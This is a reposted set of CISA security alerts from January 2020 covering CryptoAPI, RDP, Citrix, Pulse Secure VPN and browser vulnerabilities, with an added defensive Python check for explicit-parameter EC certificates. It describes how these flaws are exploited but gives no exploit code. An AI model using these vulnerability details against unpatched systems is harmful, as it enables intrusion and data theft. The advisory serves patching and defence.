The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft’s January 2020 Security Update Summary and Deployment Information and apply the necessary updates.


National Cyber Awareness System:

01/14/2020 02:08 PM EST
Original release date: January 14, 2020

The Cybersecurity and Infrastructure Security Agency (CISA) has released an Emergency Directive and Activity Alert addressing critical vulnerabilities affecting Windows CryptoAPI and Windows Remote Desktop Protocol (RDP) server and client. A remote attacker could exploit these vulnerabilities to decrypt, modify, or inject data on user connections.

Although Emergency Directive 20-02 applies only to certain Executive Branch departments and agencies, CISA strongly recommends state and local governments, the private sector, and others also patch these critical vulnerabilities as soon as possible. Review the following resources for more information:


National Cyber Awareness System:

01/14/2020 12:46 PM EST
Original release date: January 14, 2020

Summary

New vulnerabilities are continually emerging, but the best defense against attackers exploiting patched vulnerabilities is simple: keep software up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.

On January 14, 2020, Microsoft released software fixes to address 49 vulnerabilities as part of their monthly Patch Tuesday announcement. Among the vulnerabilities patched were critical weaknesses in Windows CryptoAPI and Windows Remote Desktop Protocol (RDP) server and client. An attacker could remotely exploit these vulnerabilities to decrypt, modify, or inject data on user connections:

  • CryptoAPI spoofing vulnerability – CVE-2020-0601: This vulnerability affects all machines running 32- or 64-bit Windows 10 operating systems, including Windows Server versions 2016 and 2019. This vulnerability allows Elliptic Curve Cryptography (ECC) certificate validation to bypass the trust store, enabling unwanted or malicious software to masquerade as authentically signed by a trusted or trustworthy organization. This could deceive users or thwart malware detection methods such as antivirus. Additionally, a maliciously crafted certificate could be issued for a hostname that did not authorize it, and a browser that relies on Windows CryptoAPI would not issue a warning, allowing an attacker to decrypt, modify, or inject data on user connections without detection.
  • Multiple Windows RDP vulnerabilities – CVE-2020-0609, CVE-2020-0610, and CVE-2020-0611: These vulnerabilities affect Windows Server 2012 and newer. In addition, CVE-2020-0611 affects Windows 7 and newer. These vulnerabilities—in the Windows Remote Desktop client and RDP Gateway Server—allow for remote code execution, where arbitrary code could be run freely. The server vulnerabilities do not require authentication or user interaction and can be exploited by a specially crafted request. The client vulnerability can be exploited by convincing a user to connect to a malicious server.

The Cybersecurity and Infrastructure Security Agency (CISA) is unaware of active exploitation of these vulnerabilities. However, because patches have been publicly released, the underlying vulnerabilities can be reverse-engineered to create exploits that target unpatched systems.

CISA strongly recommends organizations install these critical patches as soon as possible—prioritize patching by starting with mission critical systems, internet-facing systems, and networked servers. Organizations should then prioritize patching other affected information technology/operational technology (IT/OT) assets.

Technical Details

CryptoAPI Spoofing Vulnerability – CVE-2020-0601

A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates ECC certificates.

According to Microsoft, “an attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider.” Additionally, “a successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software.”[1]

A cyber attacker could exploit CVE-2020-0601 to obtain sensitive information, such as financial information, or run malware on a targeted system; for example:

  • A maliciously crafted certificate could appear to be issued for a hostname that did not authorize it, preventing a browser that relies on Windows CryptoAPI from validating its authenticity and issuing warnings. If the certificate impersonates a user’s bank website, their financial information could be exposed.
  • Signed malware can bypass protections (e.g., antivirus) that only run applications with valid signatures. Malicious files, emails, and executables can appear legitimate to unpatched users.

The Microsoft Security Advisory for CVE-2020-0601 addresses this vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates.

Detection Measures

The National Security Agency (NSA) provides detection measures for CVE-2020-0601 in their Cybersecurity Advisory: Patch Critical Cryptographic Vulnerability in Microsoft Windows Clients and Servers.[2]
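As an added example, not part of the CISA alert or the NSA advisory: the certificate shape behind CVE-2020-0601 is an EC key whose curve is declared with explicit parameters rather than a named-curve OID, so one defensive inventory check is to flag certificates of that shape. The DER helpers and every sample structure below are constructed for this demo (toy values, not a real curve or a real certificate):

```python
# Added example (not CISA's or Microsoft's code): flag certificates whose EC public
# key carries explicit curve parameters instead of a named-curve OID, the shape of
# certificate at issue in CVE-2020-0601. Pure-Python DER; all samples below are
# constructed toys (not a real curve, not a real certificate).

EC_PUBLIC_KEY = "1.2.840.10045.2.1"   # id-ecPublicKey
PRIME256V1 = "1.2.840.10045.3.1.7"    # named curve P-256
PRIME_FIELD = "1.2.840.10045.1.1"     # prime-field (used only in the toy params)

def der(tag, body):
    """Encode one DER TLV with definite length."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body

def der_oid(dotted):
    """Encode a dotted OID string as a DER OBJECT IDENTIFIER."""
    parts = [int(p) for p in dotted.split(".")]
    out = [40 * parts[0] + parts[1]]
    for p in parts[2:]:
        chunk = [p & 0x7F]
        p >>= 7
        while p:
            chunk.append(0x80 | (p & 0x7F))
            p >>= 7
        out.extend(reversed(chunk))
    return der(0x06, bytes(out))

def read_tlv(buf, pos=0):
    """Return (tag, value, next_pos) for the TLV starting at pos."""
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:                                    # long-form length
        nb = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + nb], "big"), pos + nb
    if pos + ln > len(buf):
        raise ValueError("truncated DER")
    return tag, buf[pos:pos + ln], pos + ln

def children(seq_value):
    """List the (tag, value) pairs directly inside a SEQUENCE value."""
    out, pos = [], 0
    while pos < len(seq_value):
        tag, val, pos = read_tlv(seq_value, pos)
        out.append((tag, val))
    return out

def classify_ec_params(spki):
    """Report how a SubjectPublicKeyInfo's AlgorithmIdentifier names its curve."""
    tag, body, _ = read_tlv(spki)
    if tag != 0x30:
        raise ValueError("SPKI must be a SEQUENCE")
    alg_tag, alg, _ = read_tlv(body)                 # AlgorithmIdentifier
    fields = children(alg) if alg_tag == 0x30 else []
    if not fields or fields[0][0] != 0x06:
        raise ValueError("algorithm OID missing")
    if der(0x06, fields[0][1]) != der_oid(EC_PUBLIC_KEY):
        return "not-ec"
    if len(fields) < 2:
        return "missing-params"
    return {0x06: "named-curve",                     # namedCurve OID
            0x30: "explicit-params",                 # specifiedCurve SEQUENCE
            0x05: "implicit"}.get(fields[1][0], "unknown")

def spki_from_certificate(cert):
    """Extract SubjectPublicKeyInfo from a DER Certificate (RFC 5280 field order)."""
    _, cert_body, _ = read_tlv(cert)
    _, tbs, _ = read_tlv(cert_body)                  # tbsCertificate
    fields = children(tbs)
    if fields and fields[0][0] == 0xA0:              # optional [0] EXPLICIT version
        fields = fields[1:]
    # serialNumber, signature, issuer, validity, subject, subjectPublicKeyInfo
    return der(*fields[5])

def has_explicit_ec_params(cert):
    """True when the certificate's EC key is declared with explicit parameters."""
    return classify_ec_params(spki_from_certificate(cert)) == "explicit-params"

# --- constructed samples (toy values, not usable keys) ---
_POINT = der(0x03, b"\x00\x04" + b"\x11" * 64)       # BIT STRING, fake uncompressed point
NAMED_SPKI = der(0x30, der(0x30, der_oid(EC_PUBLIC_KEY) + der_oid(PRIME256V1)) + _POINT)
_TOY_PARAMS = der(0x30, der(0x02, b"\x01")                                      # version
              + der(0x30, der_oid(PRIME_FIELD) + der(0x02, b"\x7f"))            # fieldID
              + der(0x30, der(0x04, b"\x01") + der(0x04, b"\x02"))              # curve a, b
              + der(0x04, b"\x04\x03\x05") + der(0x02, b"\x0b") + der(0x02, b"\x01"))  # base, order, cofactor
EXPLICIT_SPKI = der(0x30, der(0x30, der_oid(EC_PUBLIC_KEY) + _TOY_PARAMS) + _POINT)

def toy_certificate(spki):
    """Minimal unsigned Certificate wrapper so the extractor can be exercised."""
    sig_alg = der(0x30, der_oid("1.2.840.113549.1.1.11") + der(0x05, b""))
    tbs = der(0x30, der(0xA0, der(0x02, b"\x02")) + der(0x02, b"\x01") + sig_alg
              + der(0x30, b"") + der(0x30, der(0x17, b"200101000000Z") * 2)
              + der(0x30, b"") + spki)
    return der(0x30, tbs + sig_alg + der(0x03, b"\x00"))

if __name__ == "__main__":
    for name, spki in (("named", NAMED_SPKI), ("explicit", EXPLICIT_SPKI)):
        print(name, "-> explicit params:", has_explicit_ec_params(toy_certificate(spki)))
```

To run this over real certificates, feed `has_explicit_ec_params` the DER bytes of each certificate (PEM files need their base64 body decoded first).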

Windows Remote Desktop Server Vulnerabilities – CVE-2020-0609/CVE-2020-0610

According to Microsoft, “A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction.”[3],[4]

CVE-2020-0609/CVE-2020-0610:

  • Affects all supported Windows Server versions (Server 2012 and newer; support for Server 2008 ends January 14, 2020);
  • Occurs pre-authentication; and
  • Requires no user interaction to perform.

The Microsoft Security Advisories for CVE-2020-0609 and CVE-2020-0610 address these vulnerabilities.

Windows Remote Desktop Client vulnerability – CVE-2020-0611

According to Microsoft, “A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client.”[5]

CVE-2020-0611 requires the user to connect to a malicious server via social engineering, DNS poisoning, a man-in-the-middle attack, or by the attacker compromising a legitimate server.

The Microsoft Security Advisory for CVE-2020-0611 addresses this vulnerability.

Impact

A successful network intrusion can have severe impacts, particularly if the compromise becomes public and sensitive information is exposed. Possible impacts include:

  • Temporary or permanent loss of sensitive or proprietary information,
  • Disruption to regular operations,
  • Financial losses relating to restoring systems and files, and
  • Potential harm to an organization’s reputation.

Mitigations

CISA strongly recommends organizations read the Microsoft January 2020 Release Notes page for more information and apply critical patches as soon as possible—prioritize patching by starting with mission critical systems, internet-facing systems, and networked servers. Organizations should then prioritize patching other affected IT/OT assets.

General Guidance

  • Review Guide to Enterprise Patch Management Technologies, NIST Special Publication 800-40 Revision 3. Patch management is the process for identifying, acquiring, installing, and verifying patches for products and systems. This publication is designed to assist organizations in understanding the basics of enterprise patch management technologies. It explains the importance of patch management and examines the challenges inherent in performing patch management. It provides an overview of enterprise patch management technologies, and also briefly discusses metrics for measuring the technologies’ effectiveness.
  • Review CISA Insights publications. Informed by U.S. cyber intelligence and real-world events, each CISA Insight provides background information on particular cyber threats and the vulnerabilities they exploit, as well as a ready-made set of mitigation activities that non-federal partners can implement. Printable materials can be found by visiting: https://www.cisa.gov/publication/cisa-insights-publications.
  • Review CISA’s Cyber Essentials. CISA’s Cyber Essentials is a guide for leaders of small businesses as well as leaders of small and local government agencies to develop an actionable understanding of where to start implementing organizational cybersecurity practices. Essentials are the starting point to cyber readiness. To download the guide, visit: https://www.cisa.gov/publication/cisa-cyber-essentials.

References

Revisions

  • January 14, 2020: Initial version


National Cyber Awareness System:

01/13/2020 02:03 PM EST
Original release date: January 13, 2020

The Cybersecurity and Infrastructure Security Agency (CISA) has released a utility that enables users and administrators to test whether their Citrix Application Delivery Controller (ADC) and Citrix Gateway software is susceptible to the CVE-2019-19781 vulnerability. According to Citrix Security Bulletin CTX267027, beginning on January 20, 2020, Citrix will be releasing new versions of Citrix ADC and Citrix Gateway that will patch CVE-2019-19781.

CISA strongly advises affected organizations to review CERT/CC’s Vulnerability Note VU#619785 and Citrix Security Bulletin CTX267027 and apply the mitigations until Citrix releases new versions of the software.


National Cyber Awareness System:

01/10/2020 06:45 AM EST
Original release date: January 10, 2020

Summary

Unpatched Pulse Secure VPN servers continue to be an attractive target for malicious actors. Affected organizations that have not applied the software patch to fix a remote code execution (RCE) vulnerability, known as CVE-2019-11510, can become compromised in an attack.[1]

Although Pulse Secure[2] disclosed the vulnerability and provided software patches for the various affected products in April 2019, the Cybersecurity and Infrastructure Security Agency (CISA) continues to observe wide exploitation of CVE-2019-11510.[3][4][5]

CISA expects to see continued attacks exploiting unpatched Pulse Secure VPN environments and strongly urges users and administrators to upgrade to the corresponding fixes.[6]

Timeline of Specific Events

  • April 24, 2019 – Pulse Secure releases initial advisory and software updates addressing multiple vulnerabilities.
  • May 28, 2019 – Large commercial vendors receive reports of the vulnerable VPN through HackerOne.
  • July 31, 2019 – Full RCE exploit demonstrated, using the admin session hash to obtain a complete shell.
  • August 8, 2019 – Meh Chang and Orange Tsai demonstrate the VPN issues across multiple vendors (including Pulse Secure), with a detailed account of active VPN exploitation.
  • August 24, 2019 – Bad Packets identifies over 14,500 vulnerable VPN servers globally still unpatched and in need of an upgrade.
  • October 7, 2019 – The National Security Agency (NSA) produces a Cybersecurity Advisory on Pulse Secure and other VPN products being targeted actively by advanced persistent threat actors.
  • October 16, 2019 – The CERT Coordination Center (CERT/CC) releases Vulnerability Note VU#927237: Pulse Secure VPN contains multiple vulnerabilities.
  • January 2020 – Media reports that cybercriminals are now targeting unpatched Pulse Secure VPN servers to install REvil (Sodinokibi) ransomware.

Technical Details

Impact

A remote, unauthenticated attacker may be able to compromise a vulnerable VPN server. The attacker may be able to gain access to all active users and their plain-text credentials. It may also be possible for the attacker to execute arbitrary commands on each VPN client as it successfully connects to the VPN server.

Affected versions:

  • Pulse Connect Secure 9.0R1 - 9.0R3.3
  • Pulse Connect Secure 8.3R1 - 8.3R7
  • Pulse Connect Secure 8.2R1 - 8.2R12
  • Pulse Connect Secure 8.1R1 - 8.1R15
  • Pulse Policy Secure 9.0R1 - 9.0R3.1
  • Pulse Policy Secure 5.4R1 - 5.4R7
  • Pulse Policy Secure 5.3R1 - 5.3R12
  • Pulse Policy Secure 5.2R1 - 5.2R12
  • Pulse Policy Secure 5.1R1 - 5.1R15

Mitigations

This vulnerability has no viable workarounds except for applying the patches provided by the vendor and performing required system updates.

CISA strongly urges users and administrators to upgrade to the corresponding fixes.[7]

References

Revisions

  • January 10, 2020: Initial Version


National Cyber Awareness System:

01/08/2020 11:21 AM EST
Original release date: January 8, 2020

Mozilla has released security updates to address vulnerabilities in Firefox and Firefox ESR. An attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Mozilla Security Advisories for Firefox 72 and Firefox ESR 68.4 and apply the necessary updates.


National Cyber Awareness System:

01/08/2020 11:05 AM EST
Original release date: January 8, 2020

Google has released security updates for Chrome version 79.0.3945.117 for Windows, Mac, and Linux. This version addresses a vulnerability that an attacker could exploit to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Chrome Release and apply the necessary updates.


National Cyber Awareness System:

01/08/2020 03:33 PM EST
Original release date: January 8, 2020

The CERT Coordination Center (CERT/CC) has released information on a vulnerability affecting Citrix Application Delivery Controller and Citrix Gateway. A remote attacker could exploit this vulnerability to run arbitrary code on a targeted system. This vulnerability was detected in exploits in the wild.   

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review CERT/CC’s Vulnerability Note VU#619785 and Citrix Security Bulletin CTX267027 for more information and workarounds.


National Cyber Awareness System:

01/08/2020 02:58 PM EST
Original release date: January 8, 2020

Mozilla has released security updates to address a vulnerability in Firefox and Firefox ESR. An attacker could exploit this vulnerability to take control of an affected system. This vulnerability was detected in exploits in the wild.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Mozilla Security Advisory for Firefox 72.0.1 and Firefox ESR 68.4.1 and apply the necessary updates.


National Cyber Awareness System:

01/09/2020 10:41 AM EST
Original release date: January 9, 2020

Cisco has released security updates to address vulnerabilities in Cisco Webex Video Mesh, Cisco IOS, and Cisco IOS XE Software. A remote attacker could exploit these vulnerabilities to take control of an affected system. For updates addressing lower severity vulnerabilities, see the Cisco Security Advisories webpage.
 
The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Cisco Webex Video Mesh Advisory and the Cisco IOS and IOS XE Software Advisory and apply the necessary updates.


National Cyber Awareness System:

01/09/2020 10:56 AM EST
Original release date: January 9, 2020

Juniper Networks has released security updates to address multiple vulnerabilities in various Juniper products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.
 
The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Juniper Security Advisories webpage and apply the necessary updates.


National Cyber Awareness System:

01/07/2020 11:01 AM EST
Original release date: January 7, 2020

Cisco has released security updates to address multiple vulnerabilities in Data Center Network Manager (DCNM). A remote attacker could exploit these vulnerabilities to take control of an affected system. For updates addressing lower severity vulnerabilities see the Cisco Security Advisories webpage.
 
The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Cisco advisories and apply the necessary updates:


National Cyber Awareness System:

12/31/2019 01:44 PM EST
Original release date: December 31, 2019

During the holidays, internet-connected devices—also known as Internet of Things (IoT) devices—are popular gifts. These include smart cameras, smart TVs, watches, toys, phones, and tablets. Although this technology provides added convenience to our lives, it often requires that we share personal and financial information over the internet. The security of this information, and the security of these devices, is not guaranteed. For example, vendors often store personal information in databases, which may be vulnerable to cyberattacks or unintentionally exposed to the internet. Information breaches or leaks can enable malicious cyber actors to engage in identity theft and phishing scams.

The Cybersecurity and Infrastructure Security Agency (CISA) recommends users review CISA Tips on Securing the Internet of Things, Preventing and Responding to Identity Theft, and Avoiding Social Engineering and Phishing Attacks, as well as the following steps to make IoT devices more secure:

  • Use multi-factor authentication when available. Many manufacturers offer users the option to protect accounts with multi-factor authentication (MFA). MFA adds another layer of security and can significantly reduce the impact of a password compromise because the malicious cyber actor needs the other factor—often the user’s mobile phone—for authentication. See Supplementing Passwords for more information.
  • Use strong passwords. Passwords are a common form of authentication and are often the only barrier between you and your personal information. Some internet-enabled devices are configured with default passwords to simplify setup. These default passwords are easily found online, so they don't provide any protection. Choose strong passwords to help secure your device. See Choosing and Protecting Passwords for more information.
  • Evaluate your security settings. Most devices offer a variety of features that you can tailor to meet your needs and requirements. Enabling certain features to increase convenience or functionality may leave you more at risk. It is important to examine the settings—particularly security settings—and select options that meet your needs without putting you at increased risk. If you install a patch or a new version of software, or if you become aware of something that might affect your device, reevaluate your settings to make sure they are still appropriate. See Good Security Habits for more information.
  • Ensure you have up-to-date software. When manufacturers become aware of vulnerabilities in their products, they often issue patches to fix the problem. Patches are software updates that fix a particular issue or vulnerability within your device’s software. Make sure to apply relevant patches as soon as possible to protect your devices. See Understanding Patches for more information.
  • Connect carefully. Once your device is connected to the internet, it’s also connected to millions of other computers, which could allow attackers access to your device. Consider whether continuous connectivity to the internet is necessary. If it isn’t, disconnect. See Home Network Security for more information.



  

 

 

 

©1973-2020 Human Utilities Whole Armour®

"In a world of lack, Human Utilities Whole Armour® is the world's Cornucopia."™

All information provided as is provided by the author for information purposes. Any action taken regarding this information is the sole responsibility of the actor no matter what age or educational level.

HUMAN UTILITIES WHOLE ARMOUR® huwhole@huegis.com
